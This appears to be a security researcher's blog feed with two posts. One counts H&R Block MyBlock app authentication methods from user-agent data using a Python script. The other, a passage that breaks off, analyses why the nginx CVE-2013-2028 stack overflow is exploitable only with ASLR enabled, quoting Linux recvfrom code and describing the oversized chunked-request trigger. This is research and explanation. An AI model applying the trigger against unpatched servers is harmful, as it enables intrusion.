<a href="https://itunes.apple.com/us/app/my-block/id490111274">MyBlock</a> is a mobile app
offered by H&R Block. More interesting though is the juicy information H&R
Block decided to embed in these user-agent strings. As we can see, they contain
the name of the app, the version number, the OS (iOS or Android), the
device form factor (phone or tablet), and in the case of iOS, it even mentions
if TouchID or FaceID was used. As a security researcher, I'm particularly
interested in this last tidbit because people use H&R Block to file taxes and
these user-agents started appearing January 7, 2018 (i.e., tax season). So how
many people use the various authentication methods offered by Apple to protect
their tax filing app? Let's find out!</p>
<p>The following is a small Python script I wrote to filter the data. The parsing
and filtering leaves much to be desired, but I didn't want to spend too much time
on such a simple task:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="k">def</span> <span class="nf">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">):</span>
<span class="w"> </span><span class="sd">""" Parses subtokens and returns a dictionary. If invalid, None is returned.</span>
<span class="sd"> We expect Android user agents to be in the form of:</span>
<span class="sd"> HBR MOBILE ANDROID [PHONE|TABLET] MYBLOCK [VERSION] <BROWSER></span>
<span class="sd"> and iOS user agents to be in the form of:</span>
<span class="sd"> HBR MOBILE IOS [PHONE|TABLET] MYBLOCK <TOUCHID|FACEID> [VERSION] [BROWSER]</span>
<span class="sd"> """</span>
<span class="n">res</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'HRB'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'MOBILE'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'ANDROID'</span> <span class="ow">and</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'IOS'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'OS'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'PHONE'</span> <span class="ow">and</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'TABLET'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'DEVICE'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'MYBLOCK'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'APP'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'ANDROID'</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'N/A'</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'N/A'</span>
<span class="k">elif</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'N/A'</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'IOS'</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]</span> <span class="o">=</span> <span class="s1">'N/A'</span>
<span class="k">elif</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">3</span><span class="p">]</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">None</span>
<span class="c1"># Cleanups:</span>
<span class="c1"># 1) Some versions of the Android app prefix 'v' onto version</span>
<span class="k">if</span> <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="s1">'v'</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="o">=</span> <span class="n">res</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="mi">1</span><span class="p">:]</span>
<span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">res</span><span class="p">)</span> <span class="o">==</span> <span class="mi">6</span>
<span class="k">return</span> <span class="n">res</span>
<span class="k">def</span> <span class="nf">is_hrb</span><span class="p">(</span><span class="n">year</span><span class="p">,</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">):</span>
<span class="w"> </span><span class="sd">""" Validate that a line should be parsed and added to the buckets.</span>
<span class="sd"> Specifically, entry should contain the right year, be a HRB user-agent,</span>
<span class="sd"> and contain the filter keyword if one was provided.</span>
<span class="sd"> """</span>
<span class="k">if</span> <span class="n">line</span><span class="p">[:</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="n">year</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="n">line</span><span class="p">[</span><span class="mi">11</span><span class="p">:</span><span class="mi">14</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'HRB'</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="ow">not</span> <span class="nb">filter</span> <span class="ow">is</span> <span class="kc">None</span> <span class="ow">and</span> <span class="ow">not</span> <span class="nb">filter</span> <span class="ow">in</span> <span class="n">line</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o"><</span> <span class="mi">3</span><span class="p">:</span>
<span class="nb">print</span> <span class="s1">'Usage:'</span><span class="p">,</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="s1">'<tax-year>'</span><span class="p">,</span> <span class="s1">'<filter>'</span><span class="p">,</span> <span class="s1">'<filepath>'</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">)</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="nb">filter</span> <span class="o">=</span> <span class="kc">None</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">filter</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="s1">'r'</span><span class="p">)</span> <span class="k">as</span> <span class="n">ifile</span><span class="p">:</span>
<span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="n">line</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">ifile</span> <span class="k">if</span> <span class="n">is_hrb</span><span class="p">(</span><span class="n">sys</span><span class="o">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nb">filter</span><span class="p">,</span> <span class="n">line</span><span class="p">)]</span>
<span class="n">buckets</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'OS'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'IOS'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">'ANDROID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">'DEVICE'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'PHONE'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">'TABLET'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">'APP'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'MYBLOCK'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">'AUTH'</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">'TOUCHID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">'FACEID'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s1">'N/A'</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">},</span>
<span class="s1">'VERSION'</span><span class="p">:</span> <span class="p">{},</span>
<span class="s1">'BROWSER'</span><span class="p">:</span> <span class="p">{},</span>
<span class="p">}</span>
<span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
<span class="n">tokens</span> <span class="o">=</span> <span class="n">line</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">','</span><span class="p">)</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">3</span><span class="p">:</span>
<span class="nb">print</span> <span class="s1">'WARNING: Cannot tokenize:'</span><span class="p">,</span> <span class="n">line</span>
<span class="k">continue</span>
<span class="n">subtokens</span> <span class="o">=</span> <span class="n">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'-'</span><span class="p">))</span>
<span class="k">if</span> <span class="n">subtokens</span> <span class="ow">is</span> <span class="kc">None</span><span class="p">:</span>
<span class="nb">print</span> <span class="s1">'WARNING: Cannot subtokenize:'</span><span class="p">,</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s1">'-'</span><span class="p">)</span>
<span class="k">continue</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">count</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
<span class="k">except</span> <span class="ne">ValueError</span><span class="p">:</span>
<span class="nb">print</span> <span class="s1">'WARNING: Could not parse count from:'</span><span class="p">,</span> <span class="n">line</span>
<span class="k">continue</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'OS'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'OS'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'DEVICE'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'DEVICE'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'APP'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'APP'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'AUTH'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'VERSION'</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
<span class="k">if</span> <span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]</span> <span class="ow">in</span> <span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]]</span> <span class="o">+=</span> <span class="n">count</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">buckets</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">][</span><span class="n">subtokens</span><span class="p">[</span><span class="s1">'BROWSER'</span><span class="p">]]</span> <span class="o">=</span> <span class="n">count</span>
<span class="nb">print</span> <span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">buckets</span><span class="p">,</span> <span class="n">indent</span><span class="o">=</span><span class="mi">4</span><span class="p">)</span>
</code></pre></div>
<h2>Results</h2>
<p>So here's what I uncovered, listed in no particular order:</p>
<ul>
<li>From January 7 through February 8, <strong>232,248</strong> requests were made by MyBlock
apps.</li>
<li><strong>230,226</strong> requests were made from phones while <strong>2,022</strong> were tablets; over
<strong>99%</strong> of the requests were phones.</li>
<li><strong>0</strong> requests were made by Android tablets.</li>
<li>Over <strong>99%</strong> of requests were made by devices running iOS.</li>
<li>Two versions of the app appear in the dataset: <strong>6.0.0</strong> and <strong>6.1.0</strong>.</li>
<li>Version 6.1.0 makes up over <strong>99%</strong> of the requests.</li>
<li>The first requests made by version 6.1.0 occurred on January 13; <strong>6</strong> days
after the first 6.0.0 request.</li>
<li><strong>100%</strong> of requests from Android devices were version 6.1.0.</li>
<li>The requests made from Android devices contain no information about
authentication method or browser.</li>
<li><strong>100%</strong> of requests from iOS contain "Mozilla" in the user-agent.</li>
</ul>
<p>And finally, the observations relevant to my question:</p>
<ul>
<li><strong>170,816</strong> requests used TouchID, <strong>15,323</strong> FaceID,
and <strong>45,867</strong> showed neither keyword;
<strong>74%</strong>, <strong>7%</strong>, and <strong>19%</strong>, respectively.</li>
<li><strong>0%</strong> of requests for version 6.0.0 on iOS used FaceID.</li>
</ul>
<h2>Discussion</h2>
<p>For the requests from iOS devices that didn't mention an authentication method
in their user-agent, I assume the user typed in a password or pin, though I
haven't confirmed this. I also haven't looked into why all the iOS requests have
"Mozilla" at the end of their user-agent. It's probably related to the browser
framework used by the MyBlock app.</p>
<p>Judging by the fact that no requests from version 6.0.0 of the app used FaceID,
it's possible that this feature wasn't implemented until 6.1.0, though this is
just speculation.</p>
<p>Most interestingly, users appear to be comfortable with using Apple's TouchID
to protect their MyBlock. Even more interesting is that people are comfortable
with using FaceID, considering that this feature is relatively new. It appears
that in mobile computing, biometric authentication is a widely accepted trend.</p>
<p>It's also worth mentioning that while MyBlock doesn't appear to have been available during
the 2017 tax season, another H&R Block app does appear:</p>
<div class="highlight"><pre><span></span><code>HRB-MOBILE-IOS-PHONE-TAXES-6.4-Mozilla
</code></pre></div>
<p>This app seems to have two version: 6.4 and 6.3, but the total number of
requests is very low; only a few thousand. Another interesting finding is
<strong>13</strong> requests made on April 26, 2017 with this user-agent:</p>
<div class="highlight"><pre><span></span><code>HRB-MOBILE-IOS-PHONE-TAXES-nil-Mozilla
</code></pre></div>
<p>Perhaps this was a test version of the app?</p>
<h2>Future Work</h2>
<p>We still have 2 months to go in this year's tax season, so I'll be interested
to check the numbers once the season closes. I'm also interested to see how
many people continue to use this app outside of the tax season and how these
results will change in 2019.</p>How ASLR Helps Enable Exploits (CVE-2013-2028)2017-12-16T11:30:00-05:002017-12-16T11:30:00-05:00Carter Yagemanntag:carteryagemann.com,2017-12-16:/aslr-enables-exploit.html<p>The other day I was playing around with <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2028">CVE-2013-2028</a>
along with my peer <a href="https://www.cc.gatech.edu/~hhu86/">Hong Hu</a> when we came across
something odd: <em>CVE-2013-2028 is only exploitable on 64-bit GNU/Linux when ASLR is </em><em>enabled</em><em><em>.
After confirming this observation multiple times, we were left very surprised.
How could ASLR possibly </em>worsen</em> the …</p><p>The other day I was playing around with <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2028">CVE-2013-2028</a>
along with my peer <a href="https://www.cc.gatech.edu/~hhu86/">Hong Hu</a> when we came across
something odd: <em>CVE-2013-2028 is only exploitable on 64-bit GNU/Linux when ASLR is </em><em>enabled</em><em><em>.
After confirming this observation multiple times, we were left very surprised.
How could ASLR possibly </em>worsen</em> the security of an application? Driven by
curiosity, we decided to find the root cause of this result. Ultimately, we
had to go all the way to the Linux kernel code to find our answer. What we
found was a kernel quirk that can't really be called a bug from the kernel's
perspective, but does go against the expectations of the user.
So without further ado, allow
me to share how ASLR can enable the exploitation of applications.</p>
<p>For those unfamiliar with CVE-2013-2028, all that needs to be known is it's an
exploitable vulnerability in older versions of nginx stemming from a stack
buffer overflow that can be triggered by specially crafted HTTP requests.
The bug occurs because an integer provided to nginx by the user that is intended
to be an unsigned value is accidentally casted temporarily into a signed value.
If an attacker passes a sufficiently large value, the worker thread handling the
request will copy too much data from its network socket into a fixed sized buffer
causing the stack to get smashed.
For the curious reader, a more in-depth analysis is available
<a href="https://www.vnsecurity.net/research/2013/05/21/analysis-of-nginx-cve-2013-2028.html">here</a>
and a repository for reproducing it is available
<a href="https://github.com/kitctf/nginxpwn">here</a>.</p>
<p>So why is this bug only exploitable when ASLR is turned on? We can find the
user space answer with a simple <code>strace</code>. If we make a chunked HTTP request and
claim the total size is going to be <code>0xaaaaaaaaaaaaaaaa</code>, nginx's worker will
make a <code>recvfrom()</code> system call for <code>0xaaaaaaaaaaaaaab0</code> bytes from the network
socket. When ASLR is turned on, the Linux kernel will copy our request (which is
not actually <code>0xaaaaaaaaaaaaaaaa</code> bytes long) into the worker's buffer, smashing
the stack. However, when ASLR is turned off, the kernel will return <code>-EFAULT</code> and
the worker will safely report the error and close the session.</p>
<p>We could stop here, but Hong and I were not satisfied. Why is the kernel returning
<code>-EFAULT</code> when ASLR is disabled but not when it is enabled? The space allocated for
the stack is the same in both cases, so that can't be the problem. The only obvious
difference is ASLR moves the stack's address range to randomize it. When ASLR
is disabled, the stack's highest address is placed at the boundary between user and
kernel space, which is <code>0x7fffffffffff</code> in Linux kernels compiled for <code>x86_64</code>. However,
<code>0xaaaaaaaaaaaaaab0</code> is such a large number it shouldn't matter where the stack is
placed. It's not going to fit into the memory segment and it's going to cross the
boundary. So what's really happening in the kernel when it handles a <code>recvfrom()</code>
system call?</p>
<p>Taking a look at Linux's
<a href="http://elixir.free-electrons.com/linux/v4.9-rc4/source/net/socket.c#L1665">implementation</a>
of <code>recvfrom()</code>, we see the following code:</p>
<div class="highlight"><pre><span></span><code><span class="n">SYSCALL_DEFINE6</span><span class="p">(</span><span class="n">recvfrom</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="p">,</span><span class="w"> </span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="n">__user</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">ubuf</span><span class="p">,</span><span class="w"> </span><span class="kt">size_t</span><span class="p">,</span><span class="w"> </span><span class="n">size</span><span class="p">,</span>
<span class="w"> </span><span class="kt">unsigned</span><span class="w"> </span><span class="kt">int</span><span class="p">,</span><span class="w"> </span><span class="n">flags</span><span class="p">,</span><span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr</span><span class="w"> </span><span class="n">__user</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">addr</span><span class="p">,</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">__user</span><span class="w"> </span><span class="o">*</span><span class="p">,</span><span class="w"> </span><span class="n">addr_len</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">socket</span><span class="w"> </span><span class="o">*</span><span class="n">sock</span><span class="p">;</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">iovec</span><span class="w"> </span><span class="n">iov</span><span class="p">;</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">msghdr</span><span class="w"> </span><span class="n">msg</span><span class="p">;</span>
<span class="w"> </span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr_storage</span><span class="w"> </span><span class="n">address</span><span class="p">;</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">err</span><span class="p">,</span><span class="w"> </span><span class="n">err2</span><span class="p">;</span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">fput_needed</span><span class="p">;</span>
<span class="w"> </span><span class="n">err</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">import_single_range</span><span class="p">(</span><span class="n">READ</span><span class="p">,</span><span class="w"> </span><span class="n">ubuf</span><span class="p">,</span><span class="w"> </span><span class="n">size</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">iov</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msg</span><span class="p">.</span><span class="n">msg_iter</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">err</span><span class="p">))</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">err</span><span class="p">;</span>
<span class="w"> </span><span class="n">sock</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">sockfd_lookup_light</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">err</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">fput_needed</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">sock</span><span class="p">)</span>
<span class="w"> </span><span class="k">goto</span><span class="w"> </span><span class="n">out</span><span class="p">;</span>
<span class="w"> </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_control</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span>
<span class="w"> </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_controllen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="cm">/* Save some cycles and don't copy the address if not needed */</span>
<span class="w"> </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_name</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">addr</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="p">(</span><span class="k">struct</span><span class="w"> </span><span class="nc">sockaddr</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="o">&</span><span class="n">address</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span>
<span class="w"> </span><span class="cm">/* We assume all kernel code knows the size of sockaddr_storage */</span>
<span class="w"> </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span>
<span class="w"> </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_iocb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">sock</span><span class="o">-></span><span class="n">file</span><span class="o">-></span><span class="n">f_flags</span><span class="w"> </span><span class="o">&</span><span class="w"> </span><span class="n">O_NONBLOCK</span><span class="p">)</span>
<span class="w"> </span><span class="n">flags</span><span class="w"> </span><span class="o">|=</span><span class="w"> </span><span class="n">MSG_DONTWAIT</span><span class="p">;</span>
<span class="w"> </span><span class="n">err</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">sock_recvmsg</span><span class="p">(</span><span class="n">sock</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msg</span><span class="p">,</span><span class="w"> </span><span class="n">flags</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">err</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">addr</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="n">err2</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">move_addr_to_user</span><span class="p">(</span><span class="o">&</span><span class="n">address</span><span class="p">,</span>
<span class="w"> </span><span class="n">msg</span><span class="p">.</span><span class="n">msg_namelen</span><span class="p">,</span><span class="w"> </span><span class="n">addr</span><span class="p">,</span><span class="w"> </span><span class="n">addr_len</span><span class="p">);</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">err2</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span>
<span class="w"> </span><span class="n">err</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">err2</span><span class="p">;</span>
<span class="w"> </span><span class="p">}</span>
<span class="w"> </span><span class="n">fput_light</span><span class="p">(</span><span class="n">sock</span><span class="o">-></span><span class="n">file</span><span class="p">,</span><span class="w"> </span><span class="n">fput_needed</span><span class="p">);</span>
<span class="nl">out</span><span class="p">:</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>This code performs two relevant checks. The first occurs in:</p>
<div class="highlight"><pre><span></span><code><span class="n">err</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">import_single_range</span><span class="p">(</span><span class="n">READ</span><span class="p">,</span><span class="w"> </span><span class="n">ubuf</span><span class="p">,</span><span class="w"> </span><span class="n">size</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">iov</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msg</span><span class="p">.</span><span class="n">msg_iter</span><span class="p">);</span>
</code></pre></div>
<p>And the second occurs in:</p>
